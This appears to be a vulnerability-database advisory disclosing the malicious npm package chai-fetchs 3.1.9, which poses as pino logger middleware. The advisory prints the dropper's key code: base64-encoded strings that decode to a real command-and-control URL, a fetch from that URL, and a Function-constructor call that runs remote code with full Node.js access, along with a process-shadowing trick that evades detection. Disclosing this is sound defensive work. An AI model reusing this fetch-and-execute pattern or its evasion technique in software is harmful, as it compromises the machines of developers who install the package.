VDB
GCVE-110-OSM-2026-3462
GCVE-110-OSM-2026-3462
Advisory PublishedCVSS 9.6/10
Executes attacker-controlled stage-2 JavaScript by fetching from C2 endpoint `https://index-1fc9a4.tiiny.site/index.json` and running the response via `Function.constructor("require", payload)(require)`, granting the remote payload unrestricted Node.js access. The package uses a process module shadowing technique — `lib/const.js` exports hardcoded base64-encoded C2 credentials disguised as environment variable names (`DEV_API_KEY`, `DEV_SECRET_KEY`, `DEV_SECRET_VALUE`), which `lib/caller.js` decodes at runtime to contact the attacker infrastructure. Masquerades as a pino logger middleware with 41 copied legitimate files as camouflage; dropper logic is confined to two files.
**Trigger**: exports a middleware function; dropper fires on first middleware invocation (e.g. `app.use(chaiFetchs())`).
**Process shadowing**: `lib/caller.js` imports `require('./const')` aliased as `process`, replacing Node's global `process.env` with a fake env object — ensuring hardcoded attacker values are always used regardless of the victim's actual environment.
**Credential store** (`lib/const.js`): `DEV_API_KEY: "aHR0cHM6Ly9pbmRleC0xZmM5YTQudGlpbnkuc2l0ZS9pbmRleC5qc29u"` (base64 → C2 URL), `DEV_SECRET_KEY: "ZGV2LXNlY3JldC1rZXk="` (base64 → `dev-secret-key`), `DEV_SECRET_VALUE: "Xw=="` (base64 → `_`).
**C2 fetch** (`lib/caller.js` lines 9–15): `const src = atob(process.env.DEV_API_KEY)` decodes to `https://index-1fc9a4.tiiny.site/index.json`; GET request sent with header `dev-secret-key: _`; stage-2 payload extracted from `response.data.cookie`.
**Stage-2 execution**: `new Function.constructor("require", s); handler(require)` — eval-equivalent bypassing naive `eval()` detection, granting the payload full access to all Node.js built-in modules.
**Resilience**: retries C2 fetch up to 5 times before aborting.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | chai-fetchs | 3.1.9 (affected) | — |
Browse GCVE Records
73,685 records in the GCVE database · Updated July 18, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.